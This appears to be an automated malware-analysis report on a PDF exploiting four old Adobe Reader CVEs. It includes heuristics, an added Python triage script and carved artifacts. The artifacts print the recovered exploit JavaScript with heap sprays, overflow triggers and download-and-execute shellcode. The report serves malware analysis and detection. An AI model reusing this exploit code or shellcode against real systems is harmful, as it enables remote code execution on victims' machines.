Verdict: MALICIOUS
Risk score: 508
Malware Insights

This PDF carries JavaScript that targets four known Adobe Reader vulnerabilities: CVE-2009-4324 (media.newPlayer), CVE-2009-0927 (Collab.getIcon), CVE-2007-5659 (Collab.collectEmailInfo) and CVE-2008-2992 (util.printf). The exploit is not in the 252-byte /JS stub of object 19: that stub collects the words of page 0 with getPageNumWords()/getPageNthWord() and, in this copy, only shows the result with app.alert() (its remaining lines are commented out). The script itself sits in the page content stream at 0x8C as percent-encoded Tj string operands cut into roughly 100-character pieces, and the stream at 0x2F3A decodes to the same script directly.

The recovered stage is a per-vulnerability dispatcher with one function per exploit path. printd() sprays 0x2000 strings of 32,768 code units (a short %u sled plus shellcode), calls util.printd() with a crafted date format and then this.media.newPlayer(null). util_printf() sprays 1400 blocks of about 0x40000 code units padded with 0x0A0A and calls util.printf("%45000f", num). collab_email() fills memory toward 0x0c0c0c0c with 4 MB blocks of 0x90 sled plus shellcode and passes a msg grown past 44,952 characters to Collab.collectEmailInfo(). collab_geticon() is cut off in the preview right after its opening check (if(app...). Every branch embeds the same %u-encoded shellcode, a download-and-execute stub: it walks the PEB to find kernel32 (33 C0 64 8B 40 30 ...), resolves exports through the classic ROR-13 name hash with the immediates 0x5B8ACA33 (GetTempPathA), 0xEC0E4E8E (LoadLibraryA, after pushing "urlmon.dll"), 0x702F1A36 (URLDownloadToFileA), 0x0E8AFE98 (WinExec) and 0x60E0CEEF (ExitThread), and uses the temp directory plus "e.exe" as the drop path (the immediates "e.ex" and "e" are written after the path). The bytes after the last call decode to the ASCII tag ?spl=pdf_pack (?spl=pdf_new in the printd() copy), the kind of request marker exploit kits use to record which exploit fired; no download host is visible in the recovered stage. ClamAV detects the bare-script artifacts as Js.Exploit.Shellcode-18.

Caveat when working from the carved artifacts: the second percent-decode pass (generic_stage_recovery_002.js and _003.js) was run on text that was already a script and over-decodes it, turning the %af that opens each %afunction into one 0xAF byte and the %45000f format string into E000f. Use the single-pass artifacts (_000 and _001) as the faithful copy.

MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 Command and Scripting Interpreter: JavaScript
Machine Learning
- Nyx PDF Classifier: malicious score 1.0000
Heuristics (10)

- media.newPlayer (CVE-2009-4324). Severity: critical. CVE match: exact. Rule: CVE_2009_4324. PDF JavaScript calls media.newPlayer. CVE-2009-4324 is a use-after-free in Adobe Reader's multimedia plugin triggered by media.newPlayer(); it was actively exploited as a zero-day in December 2009. (Identified after JavaScript deobfuscation.)
- Collab.getIcon (CVE-2009-0927). Severity: critical. CVE match: exact. Rule: CVE_2009_0927. PDF JavaScript calls Collab.getIcon. CVE-2009-0927 is a stack buffer overflow in Adobe Reader triggered by Collab.getIcon() with a crafted argument; it allows arbitrary code execution. (Identified after JavaScript deobfuscation.)
- Collab.collectEmailInfo (CVE-2007-5659). Severity: critical. CVE match: exact. Rule: CVE_2007_5659. PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by an over-long msg argument passed to Collab.collectEmailInfo() (this sample grows msg past 44,952 code units); it is one of a series of Acrobat JavaScript API exploits. (Identified after JavaScript deobfuscation.)
- util.printf (CVE-2008-2992). Severity: critical. CVE match: exact. Rule: CVE_2008_2992. PDF JavaScript calls util.printf(). CVE-2008-2992 is a stack buffer overflow in Adobe Reader triggered by an over-long field width in the format specifier (this sample uses "%45000f"); it was widely exploited in the wild after disclosure. (Identified after JavaScript deobfuscation.)
- Pidief-style multi-CVE JavaScript dispatcher. Severity: critical. CVE match: likely. Rule: PDF_PIDIEF_MULTI_CVE_DISPATCH. A single JavaScript body branches on app.viewerVersion and invokes two or more of the canonical Reader sinks (Collab.collectEmailInfo, Collab.getIcon, util.printf with a field-width format string). This is the 2009-2010 Pidief.J multi-exploit landing template: a per-version dispatcher that fires the matching CVE chain for whichever Reader version opens the file. Here the recovered stage defines one function per path: printd(), util_printf(), collab_email() and collab_geticon().
- Multi-CVE Adobe Reader JavaScript exploit kit. Severity: critical. Rule: PDF_ADOBE_READER_MULTI_CVE_JS_KIT. One recovered JavaScript stage contains multiple version-gated Adobe Reader exploit branches. This is stronger evidence than independent API keywords: the PDF selects old Reader vulnerabilities by viewer version and runs heap-sprayed Acrobat JavaScript exploit paths.
- Generic recovered JavaScript exploit stage. Severity: high. Rule: PDF_GENERIC_STAGE_RECOVERY. Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers. For this sample the transform was percent decoding of the decompressed streams at 0x8C and 0x2F3A.
- JavaScript action. Severity: low. 1 related finding. Rule: PDF_JAVASCRIPT. PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream. Severity: low. Rule: PDF_JS. PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Suspicious extracted artifact. Severity: info. Rule: EXTRACTED_FILE_STATIC_TRIAGE. One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
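The dispatcher and stage-recovery heuristics above can be reproduced on the carved artifacts. The Python below is an added example, not part of this report or of the analyzer that produced it: it carves the Tj string operands out of a page content stream (handling PDF literal-string backslash escapes and nested parentheses), joins them back into one script, splits the script into its functions, and reports per function which Reader sinks are reached, whether it builds a %u-encoded string, and the util.printf field width. The content stream is constructed from fragments of the generic_stage_recovery_000.js preview on this page, re-chunked by hand; the sink-to-CVE table and the "two or more distinct sinks" rule are my reading of the heuristics, not the analyzer's code.

```python
import re
from typing import Dict, List

# Constructed page content stream. The Tj operands are fragments of the script
# shown in this report's generic_stage_recovery_000.js preview, re-chunked by
# hand (a cut inside "return" is kept on purpose); the one unbalanced
# parenthesis in the last fragment is escaped as PDF literal strings require.
CONTENT_STREAM = r"""2 J
0.57 w
BT /F1 3.00 Tf ET
BT 5.67 831.07 Td (function fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}retu) Tj ET
BT 31.19 816.90 Td (rn yarsp.substring(0,len/2);}function printd(){var nx=unescape("%u9342%u3f4a");while(nx.length<=32768)nx+=nx;util.printd("1.345678901.3456 : 1.31.34", new Date());try{this.media.newPlayer(null);}catch(e){}}) Tj ET
BT 31.19 802.72 Td (function util_printf(){var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");var num=12999999999999999999888888;util.printf("%45000f",num);}) Tj ET
BT 31.19 788.55 Td (function collab_email(){var overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}this.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}) Tj ET
BT 31.19 774.38 Td (function collab_geticon(){if\(app) Tj ET
"""

# Acrobat JavaScript sinks the dispatcher heuristic looks for, and the CVE each
# one implies when reached with crafted input (my table, from the rules above).
SINKS = {
    "media.newPlayer": "CVE-2009-4324",
    "Collab.getIcon": "CVE-2009-0927",
    "Collab.collectEmailInfo": "CVE-2007-5659",
    "util.printf": "CVE-2008-2992",
}

_PDF_ESCAPES = {"n": "\n", "r": "\r", "t": "\t", "b": "\b", "f": "\f"}


def carve_tj_strings(stream: str) -> List[str]:
    """Literal-string operands of Tj, in stream order, with backslash escapes
    resolved and balanced nested parentheses kept (octal escapes and line
    continuations are not needed for this stream and are left out)."""
    out, i, n = [], 0, len(stream)
    while i < n:
        if stream[i] != "(":
            i += 1
            continue
        depth, buf, j = 1, [], i + 1
        while j < n:
            c = stream[j]
            if c == "\\" and j + 1 < n:
                buf.append(_PDF_ESCAPES.get(stream[j + 1], stream[j + 1]))
                j += 2
                continue
            if c == "(":
                depth += 1
            elif c == ")":
                depth -= 1
                if depth == 0:
                    break
            buf.append(c)
            j += 1
        if re.match(r"\s*Tj\b", stream[j + 1:j + 6]):  # keep only Tj operands
            out.append("".join(buf))
        i = j + 1
    return out


def reassemble_script(stream: str) -> str:
    """The operands are consecutive slices of one script, so join with no
    separator (a token such as 'return' may straddle two operands)."""
    return "".join(carve_tj_strings(stream))


def split_functions(script: str) -> Dict[str, str]:
    """Map each 'function name(' to the text up to the next function."""
    parts = re.split(r"function\s+(\w+)\s*\(", script)
    return {parts[k]: parts[k + 1] for k in range(1, len(parts) - 1, 2)}


def triage(script: str) -> Dict[str, dict]:
    """Per-function summary: sinks/CVEs reached, whether a %u-encoded string
    (spray block or shellcode) is built, and the util.printf field width."""
    report = {}
    for name, body in split_functions(script).items():
        cves = sorted(cve for sink, cve in SINKS.items() if sink + "(" in body)
        width = re.search(r'util\.printf\("%(\d+)f"', body)
        report[name] = {
            "cves": cves,
            "heap_spray": 'unescape("%u' in body,
            "printf_width": int(width.group(1)) if width else None,
        }
    return report


def is_multi_cve_dispatcher(report: Dict[str, dict]) -> bool:
    """The PDF_PIDIEF_MULTI_CVE_DISPATCH condition as I read it: one script
    body reaching two or more distinct Reader exploit sinks."""
    return len({c for r in report.values() for c in r["cves"]}) >= 2


if __name__ == "__main__":
    rep = triage(reassemble_script(CONTENT_STREAM))
    for fn, r in rep.items():
        print(f"{fn:15s} {r}")
    print("multi-CVE dispatcher:", is_multi_cve_dispatcher(rep))
```

Real streams come out of the PDF compressed, so decompress first (the report's source field says the 0x8C stream was decompressed before decoding). The Collab.getIcon branch is absent from the constructed input because this page's preview is truncated before that call; the triage therefore reports three CVEs rather than the four the full stage carries.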
Extracted artifacts (5)
Files carved from inside the sample during analysis.

| # | Filename | Kind | Source | Size | ClamAV |
|---|---|---|---|---|---|
| 1 | javascript_obj0019_000.js | pdf-javascript-stream | PDF /JS object 19 at offset 0x2D91 | 252 bytes | (no result shown) |
| 2 | generic_stage_recovery_000.js | deobfuscated-js | percent-decode of decompressed stream at 0x8C | 7103 bytes | No threats found |
| 3 | generic_stage_recovery_001.js | deobfuscated-js | percent-decode of decompressed stream at 0x2F3A | 5790 bytes | Js.Exploit.Shellcode-18 |
| 4 | generic_stage_recovery_002.js | deobfuscated-js | percent-decode -> percent-decode of decompressed stream at 0x8C | 7087 bytes | No threats found |
| 5 | generic_stage_recovery_003.js | deobfuscated-js | percent-decode -> percent-decode of decompressed stream at 0x2F3A | 5772 bytes | Js.Exploit.Shellcode-18 |

Artifact 1: javascript_obj0019_000.js
SHA-256: 8b81fa4d9dccfcc68da5a1b1c8e623faf0476e4e83af3d13fb7bf56b5290fd61
Kind: pdf-javascript-stream
Source: PDF /JS object 19 at offset 0x2D91
Size: 252 bytes
Preview script (first 1,000 lines):
var s='';
var l=this.getPageNumWords(0);
for(var i=0; i < l; i++)
{
s+=this.getPageNthWord(0,i) + ' ';
}
app.alert(s);
// app.alert(this.info.title);
// var obj=this.doc;
// for(var i in obj) s+=i+' = ' + obj[i]+"\n";
// app.alert(s);

Artifact 2: generic_stage_recovery_000.js
SHA-256: f37650d63830f978e9ea194ed7fe6c055ee9108003ba6d392487360148c5e203
Kind: deobfuscated-js
Source: generic stage recovery, percent-decode of the decompressed stream at 0x8C
Size: 7103 bytes
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 10 eval/decoder/string-building tokens).
Note: this is the page content stream itself; the script sits percent-encoded inside the Tj string operands, cut into roughly 100-character pieces, which is the text the object 19 stub gathers word by word.
Preview script (first 1,000 lines):
2 J
0.57 w
0.004 G
BT /F1 3.00 Tf ET
BT 5.67 831.07 Td (%afunction fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);retu%7) Tj ET
BT 31.19 816.90 Td (2n yarsp;}%afunction printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u%3) Tj ET
BT 31.19 802.72 Td (8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u045%) Tj ET
BT 31.19 788.55 Td (35%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u) Tj ET
BT 31.19 774.38 Td (0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u03%3) Tj ET
BT 31.19 760.20 Td (8A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%%) Tj ET
BT 31.19 746.03 Td (7566AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC0) Tj ET
BT 31.19 731.86 Td (33%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%2) Tj ET
BT 31.19 717.68 Td (5u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u6E5F%u7765");var nx = unescape("%u934%) Tj ET
BT 31.19 703.51 Td (32%u3f4a"); while(nx.length <= 32768) nx += nx; nx = nx.substring(0, 32768 - shellcode.length); memo) Tj ET
BT 31.19 689.34 Td (ry = new Array(); for(i = 0; i < 0x2000; i++) { memory[i]= nx + shellcode; } util.printd("1.345678%3) Tj ET
BT 31.19 675.16 Td (901.345678901.3456 : 1.31.34", new Date()); util.printd("1.345678901.345678901.3456 : 1.31.34", new%) Tj ET
BT 31.19 660.99 Td (20Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd("1.345678901.345678901.3456 : 1) Tj ET
BT 31.19 646.82 Td (.31.34", new Date());}%afunction util_printf(){var payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%) Tj ET
BT 31.19 632.64 Td (u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uE%4) Tj ET
BT 31.19 618.47 Td (183%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%) Tj ET
BT 31.19 604.30 Td (25u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD) Tj ET
BT 31.19 590.12 Td (303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84%4) Tj ET
BT 31.19 575.95 Td (6%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u%) Tj ET
BT 31.19 561.78 Td (30455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB85) Tj ET
BT 31.19 547.60 Td (6%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var %6) Tj ET
BT 31.19 533.43 Td (eop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");%avar heapblock=nop+payload;var bigblock=unescape("%u0A0A%u%3) Tj ET
BT 31.19 519.26 Td (0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigbloc%) Tj ET
BT 31.19 505.08 Td (6b+=bigblock;}%avar fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.len%) Tj ET
BT 31.19 490.91 Td (67th-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}%avar mem_array=new Array(%) Tj ET
BT 31.19 476.74 Td (29;for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}%avar num=1299999999999999999988888888888888%) Tj ET
BT 31.19 462.56 Td (3888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888) Tj ET
BT 31.19 448.39 Td (88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888%3) Tj ET
BT 31.19 434.22 Td (88888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}%afunc%7) Tj ET
BT 31.19 420.05 Td (4ion collab_email(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%%) Tj ET
BT 31.19 405.87 Td (7509EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u73) Tj ET
BT 31.19 391.70 Td (8B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u41
... (truncated)

Artifact 3: generic_stage_recovery_001.js
SHA-256: a11875bca3f14ff7331efc5fe4379e9431abfc674f2320eecdbce7e97b7dc8b9
Kind: deobfuscated-js
Source: generic stage recovery, percent-decode of the decompressed stream at 0x2F3A
Size: 5790 bytes
Detection: ClamAV: Js.Exploit.Shellcode-18. Obfuscation or payload: likely (carved artifact contains 11 eval/decoder/string-building tokens and 1 long base64-like blob).
Note: this is the bare script without PDF operators; the same functions appear percent-encoded inside the 0x8C content stream (artifact 2).
Preview script (first 1,000 lines):
%afunction fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);return yarsp;}%afunction printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u6E5F%u7765");var nx = unescape("%u9342%u3f4a"); while(nx.length <= 32768) nx += nx; nx = nx.substring(0, 32768 - shellcode.length); memory = new Array(); for(i = 0; i < 0x2000; i++) { memory[i]= nx + shellcode; } util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); util.printd("1.345678901.345678901.3456 : 1.31.34", new Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd("1.345678901.345678901.3456 : 1.31.34", new Date());}%afunction util_printf(){var 
payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");%avar heapblock=nop+payload;var bigblock=unescape("%u0A0A%u0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigblock+=bigblock;}%avar fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.length-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}%avar mem_array=new Array();for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}%avar num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;util.printf("%45000f",num);}%afunction collab_email(){var 
shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var mem_array=new Array();var cc=0x0c0c0c0c;var addr=0x400000;var sc_len=shellcode.length*2;var len=addr-(sc_len+0x38);var yarsp=unescape("%u9090%u9090");yarsp=fix_it(yarsp,len);var count2=(cc-0x400000)/addr;for(var count=0;count<count2;count++){mem_array[count]=yarsp+shellcode;}%avar overflow=unescape("%u0c0c%u0c0c");while(overflow.length<44952){overflow+=overflow;}%athis.collabStore=Collab.collectEmailInfo({subj:"",msg:overflow});}%afunction collab_geti
... (truncated)

Artifact 4: generic_stage_recovery_002.js
SHA-256: a06725f549bf116b6ebf3f49cfeff0b54cf10ce47f68fe02864325edaf1e2070
Kind: deobfuscated-js
Source: generic stage recovery, percent-decode -> percent-decode of the decompressed stream at 0x8C
Size: 7087 bytes
Detection: ClamAV: No threats found. Obfuscation or payload: likely (carved artifact contains 10 eval/decoder/string-building tokens).
Note: this is a second percent-decode pass over the already-decoded text of artifact 2 and it over-decodes: the "%af" opening each "%afunction" becomes one 0xAF byte (rendered as � below) and "%45000f" becomes "E000f". Treat artifact 2 as the faithful copy.
Preview script (first 1,000 lines):
2 J
0.57 w
0.004 G
BT /F1 3.00 Tf ET
BT 5.67 831.07 Td (�unction fix_it(yarsp,len){while(yarsp.length*2<len){yarsp+=yarsp;}yarsp=yarsp.substring(0,len/2);retu%7) Tj ET
BT 31.19 816.90 Td (2n yarsp;}�unction printd(){var shellcode = unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u%3) Tj ET
BT 31.19 802.72 Td (8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u045%) Tj ET
BT 31.19 788.55 Td (35%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u) Tj ET
BT 31.19 774.38 Td (0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u03%3) Tj ET
BT 31.19 760.20 Td (8A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%%) Tj ET
BT 31.19 746.03 Td (7566AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC0) Tj ET
BT 31.19 731.86 Td (33%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%2) Tj ET
BT 31.19 717.68 Td (5u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u6E5F%u7765");var nx = unescape("%u934%) Tj ET
BT 31.19 703.51 Td (32%u3f4a"); while(nx.length <= 32768) nx += nx; nx = nx.substring(0, 32768 - shellcode.length); memo) Tj ET
BT 31.19 689.34 Td (ry = new Array(); for(i = 0; i < 0x2000; i++) { memory[i]= nx + shellcode; } util.printd("1.345678%3) Tj ET
BT 31.19 675.16 Td (901.345678901.3456 : 1.31.34", new Date()); util.printd("1.345678901.345678901.3456 : 1.31.34", new%) Tj ET
BT 31.19 660.99 Td (20Date()); try {this.media.newPlayer(null);} catch(e) {} util.printd("1.345678901.345678901.3456 : 1) Tj ET
BT 31.19 646.82 Td (.31.34", new Date());}�unction util_printf(){var payload=unescape("%uC033%u8B64%u3040%u0C78%u408B%) Tj ET
BT 31.19 632.64 Td (u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uE%4) Tj ET
BT 31.19 618.47 Td (183%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%) Tj ET
BT 31.19 604.30 Td (25u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD) Tj ET
BT 31.19 590.12 Td (303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84%4) Tj ET
BT 31.19 575.95 Td (6%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u%) Tj ET
BT 31.19 561.78 Td (30455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB85) Tj ET
BT 31.19 547.60 Td (6%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u733F%u6C70%u703D%u6664%u705F%u6361%u006B");var %6) Tj ET
BT 31.19 533.43 Td (eop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");%avar heapblock=nop+payload;var bigblock=unescape("%u0A0A%u%3) Tj ET
BT 31.19 519.26 Td (0A0A");var headersize=20;var spray=headersize+heapblock.length;while(bigblock.length<spray){bigbloc%) Tj ET
BT 31.19 505.08 Td (6b+=bigblock;}%avar fillblock=bigblock.substring(0,spray);var block=bigblock.substring(0,bigblock.len%) Tj ET
BT 31.19 490.91 Td (67th-spray);while(block.length+spray<0x40000){block=block+block+fillblock;}%avar mem_array=new Array(%) Tj ET
BT 31.19 476.74 Td (29;for(var i=0;i<1400;i++){mem_array[i]=block+heapblock;}%avar num=1299999999999999999988888888888888%) Tj ET
BT 31.19 462.56 Td (3888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888) Tj ET
BT 31.19 448.39 Td (88888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888%3) Tj ET
BT 31.19 434.22 Td (88888888888888888888888888888888888888888888888888888888888888888;util.printf("E000f",num);}�unc%7) Tj ET
BT 31.19 420.05 Td (4ion collab_email(){var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%%) Tj ET
BT 31.19 405.87 Td (7509EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u73) Tj ET
BT 31.19 391.70 Td (8B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u
... (truncated)

Artifact 5: generic_stage_recovery_003.js
SHA-256: 2bd9a2ebd4e611d32052e997a47a2a8ad7b1edc2138954094205c1d0c02eecfb
Kind: deobfuscated-js
Source: generic stage recovery, percent-decode -> percent-decode of the decompressed stream at 0x2F3A
Size: 5772 bytes
Detection: ClamAV: Js.Exploit.Shellcode-18. Obfuscation or payload: likely (carved artifact contains 11 eval/decoder/string-building tokens and 1 long base64-like blob).
Note: second percent-decode pass over artifact 3, with the same over-decoding ("%af" to 0xAF, "%45000f" to "E000f"). Treat artifact 3 as the faithful copy.
Preview script (first 1,000 lines):
